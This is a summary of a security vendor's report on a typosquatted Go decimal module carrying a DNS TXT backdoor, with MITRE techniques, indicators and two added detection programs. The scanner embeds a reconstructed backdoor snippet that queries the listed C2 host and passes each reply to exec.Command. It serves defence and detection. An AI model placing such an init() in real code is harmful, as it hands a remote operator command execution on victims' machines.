Popular Go Decimal Library Targeted by Long-Running Typosquat with DNS Backdoor

Socket’s Threat Research Team identified a typosquatted Go module, github.com/shopsprint/decimal, that mimics the legitimate github.com/shopspring/decimal library and was weaponized in v1.3.3 with a DNS TXT-based backdoor. The malicious release remains fetchable through proxy.golang.org and pkg.go.dev even after the GitHub repository and owner account were removed, so any project that already imports the module path keeps resolving and building the backdoored version, an ongoing supply chain risk.

Keypoints

  • Socket found a malicious Go module published as github.com/shopsprint/decimal, a one-character typosquat of the legitimate github.com/shopspring/decimal.
  • The package was present since 2017, but version v1.3.3 published on 2023-08-19 added a malicious init() backdoor.
  • The payload uses DNS TXT queries to dnslog-cdn-images.freemyip.com as a command-and-control channel and executes returned TXT values with os/exec.
  • The malicious code runs automatically on import in a background goroutine and can persist for the lifetime of any process that depends on it.
  • Even though the GitHub repo and owner account were deleted, the malicious version remains available through proxy.golang.org and pkg.go.dev.
  • The legitimate shopspring/decimal package is widely used, making this typosquat a high-value supply chain target.
  • Socket recommends removing the dependency, replacing it with the canonical package, and alerting on TXT lookups to the listed domain.
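The behaviour described above (an init() that spawns a goroutine, resolves TXT records with net.LookupTXT and hands each value to exec.Command) is a pattern that can be checked for statically in vendored or module-cache source. The following is an added example written for this summary, not code from Socket or from the shopsprint/decimal module: a small go/ast scanner that flags any package-level init() whose body, including nested goroutines and closures, calls both net.LookupTXT and exec.Command. The two embedded Go sources are constructed inputs (one shaped like the reported backdoor, one benign) and are not the actual malicious file; the hostname is the one the report lists.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"strings"
)

// Constructed sample shaped like the init()-based backdoor the report
// describes (DNS TXT lookup whose results feed exec.Command). This is an
// illustrative reconstruction for the scanner, not the real malicious source.
const suspiciousSrc = `package decimal

import (
	"net"
	"os/exec"
)

func init() {
	go func() {
		txts, _ := net.LookupTXT("dnslog-cdn-images.freemyip.com")
		for _, t := range txts {
			exec.Command(t).Run()
		}
	}()
}
`

// Constructed benign sample: an init() that resolves a name but never
// spawns a process, so it must not be flagged.
const benignSrc = `package decimal

import "net"

var addr string

func init() {
	ip, _ := net.LookupIP("example.com")
	_ = ip
	addr = "x"
}
`

// Finding describes a package-level init() that both resolves TXT records
// and spawns a process, the combination this report describes.
type Finding struct {
	File  string
	Line  int
	Calls []string // qualified pkg.Func calls seen inside the init body
}

// selectorName returns "pkg.Func" for a call of the form pkg.Func(...), or "".
func selectorName(call *ast.CallExpr) string {
	sel, ok := call.Fun.(*ast.SelectorExpr)
	if !ok {
		return ""
	}
	pkg, ok := sel.X.(*ast.Ident)
	if !ok {
		return ""
	}
	return pkg.Name + "." + sel.Sel.Name
}

// ScanSource parses one Go file and reports every init() whose body calls
// both net.LookupTXT and exec.Command. ast.Inspect walks into the `go func()`
// literal, which matters: the backdoor runs in a background goroutine, so a
// shallow check of init's top-level statements would miss it.
func ScanSource(filename, src string) ([]Finding, error) {
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	var findings []Finding
	for _, decl := range f.Decls {
		fn, ok := decl.(*ast.FuncDecl)
		if !ok || fn.Name.Name != "init" || fn.Recv != nil || fn.Body == nil {
			continue
		}
		var calls []string
		seen := map[string]bool{}
		ast.Inspect(fn.Body, func(n ast.Node) bool {
			if call, ok := n.(*ast.CallExpr); ok {
				if name := selectorName(call); name != "" && !seen[name] {
					seen[name] = true
					calls = append(calls, name)
				}
			}
			return true
		})
		if seen["net.LookupTXT"] && seen["exec.Command"] {
			findings = append(findings, Finding{
				File:  filename,
				Line:  fset.Position(fn.Pos()).Line,
				Calls: calls,
			})
		}
	}
	return findings, nil
}

func main() {
	samples := map[string]string{"suspicious.go": suspiciousSrc, "benign.go": benignSrc}
	for name, src := range samples {
		findings, err := ScanSource(name, src)
		if err != nil {
			fmt.Println("parse error:", err)
			continue
		}
		for _, fd := range findings {
			fmt.Printf("%s:%d init() resolves TXT records and spawns processes: %s\n",
				fd.File, fd.Line, strings.Join(fd.Calls, ", "))
		}
	}
}
```

Run it over `$(go env GOMODCACHE)` or a vendor/ tree by parsing each .go file with ScanSource; an import path can be aliased (`import x "os/exec"`), so a production version should resolve the selector through the file's import declarations rather than matching the literal package name as this example does.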

MITRE Techniques

  • [T1195.002] Compromise Software Supply Chain – The attacker published a typosquatted Go module that passed as the legitimate one for years before it was weaponized (‘a malicious Go module published as github.com/shopsprint/decimal’).
  • [T1071.004] Application Layer Protocol: DNS – The backdoor used DNS TXT queries as its command-and-control channel (‘net.LookupTXT("dnslog-cdn-images.freemyip.com")’).
  • [T1059] Command and Scripting Interpreter – Returned TXT values were executed directly as commands via Go process execution (‘Each TXT value returned by the C2 subdomain is passed directly to exec.Command(txt)’).
  • [T1583.001] Acquire Infrastructure: Domains – The attacker used a subdomain on a dynamic DNS provider to host C2 infrastructure (‘dnslog-cdn-images.freemyip.com’ on freemyip.com).
  • [T1572] Protocol Tunneling – The operator carried C2 tasking inside DNS TXT responses, which blend into ordinary resolver traffic, rather than using a more obvious channel (‘DNS TXT is a covert channel rather than a transport’).
  • [T1568] Dynamic Resolution – The C2 endpoint was controlled through a dynamic DNS service, allowing the operator to change records quickly (‘The use of TXT records … through their DDNS account’).

Indicators of Compromise

  • [Malicious Package] trojanized Go module and version – github.com/shopsprint/decimal v1.3.3 (github.com/shopspring/decimal is the legitimate reference)
  • [Domain] DNS C2 host used by the payload – dnslog-cdn-images.freemyip.com, freemyip.com
  • [File Hashes] malicious release and source file hashes – SHA-256 dd9c0268c8944e6ddf90d4d0c81aa843785b7a9ee965faa635841ed9fc0ba086, SHA-256 387d7ea5ca733b1e7219c943f4b461877a8df0148adfef42b1538b6c398fbb41
  • [Commit Hash] malicious commit associated with the release – 2f0ee073c6f29d66188a845592029c9b52528f04
  • [File Name] trojanized source file referenced in the diff – decimal.go, v1.3.3 module zip
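The recommended detection is an alert on TXT lookups to the listed domain. The following is an added example, not part of Socket's report, showing that check over resolver query logs. It assumes BIND-style query log lines (the four lines embedded here are constructed samples, not captured traffic) and goes slightly beyond the single indicator: an exact TXT lookup of the reported C2 host is rated high, while a TXT lookup of any other freemyip.com name is rated medium, since the operator can create further subdomains through the same dynamic DNS account.

```go
package main

import (
	"bufio"
	"fmt"
	"regexp"
	"strings"
)

// Indicators from the report: the C2 host and the dynamic-DNS apex it sits under.
const (
	c2Host   = "dnslog-cdn-images.freemyip.com"
	ddnsApex = "freemyip.com"
)

// Constructed BIND-style query log lines written for this example
// (client address, qname, qtype); they are not captured traffic.
const sampleLog = `19-Aug-2023 14:02:11.512 client @0x7f3c 10.0.0.5#51523 (dnslog-cdn-images.freemyip.com): query: dnslog-cdn-images.freemyip.com IN TXT +E(0)K (10.0.0.1)
19-Aug-2023 14:02:12.004 client @0x7f3d 10.0.0.7#40211 (proxy.golang.org): query: proxy.golang.org IN A +E(0)K (10.0.0.1)
19-Aug-2023 14:02:13.771 client @0x7f3e 10.0.0.9#53012 (build42.freemyip.com): query: build42.freemyip.com IN TXT +E(0)K (10.0.0.1)
19-Aug-2023 14:02:14.100 client @0x7f3f 10.0.0.5#51524 (dnslog-cdn-images.freemyip.com): query: dnslog-cdn-images.freemyip.com IN A +E(0)K (10.0.0.1)
`

// queryRe captures client IP, qname and qtype from a BIND query log line.
var queryRe = regexp.MustCompile(`client @\S+ (\S+)#\d+ \(\S+\): query: (\S+) IN (\S+) `)

// Alert is one matched lookup with the confidence assigned to it.
type Alert struct {
	Client   string
	QName    string
	Severity string
}

// normalize lower-cases a name and drops a trailing dot so FQDN and
// relative forms compare equal.
func normalize(qname string) string {
	return strings.ToLower(strings.TrimSuffix(qname, "."))
}

// classify returns "high" for a TXT lookup of the exact C2 host, "medium"
// for a TXT lookup of any other name under the DDNS apex, and "" otherwise.
// Non-TXT lookups are ignored: the backdoor only ever asks for TXT records.
func classify(qname, qtype string) string {
	if qtype != "TXT" {
		return ""
	}
	name := normalize(qname)
	switch {
	case name == c2Host:
		return "high"
	case strings.HasSuffix(name, "."+ddnsApex):
		return "medium"
	}
	return ""
}

// DetectTXTBeacons scans query log text line by line and returns the
// lookups that match the indicators, in log order.
func DetectTXTBeacons(log string) []Alert {
	var alerts []Alert
	sc := bufio.NewScanner(strings.NewReader(log))
	for sc.Scan() {
		m := queryRe.FindStringSubmatch(sc.Text())
		if m == nil {
			continue
		}
		if sev := classify(m[2], m[3]); sev != "" {
			alerts = append(alerts, Alert{Client: m[1], QName: normalize(m[2]), Severity: sev})
		}
	}
	return alerts
}

func main() {
	for _, a := range DetectTXTBeacons(sampleLog) {
		fmt.Printf("[%s] %s queried TXT %s\n", a.Severity, a.Client, a.QName)
	}
}
```

A build host or CI runner that matches the high rule has most likely already executed the v1.3.3 init(), so the response is to treat that host as compromised, not merely to remove the dependency.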


Read more: https://socket.dev/blog/popular-go-decimal-library-typosquat-dns-backdoor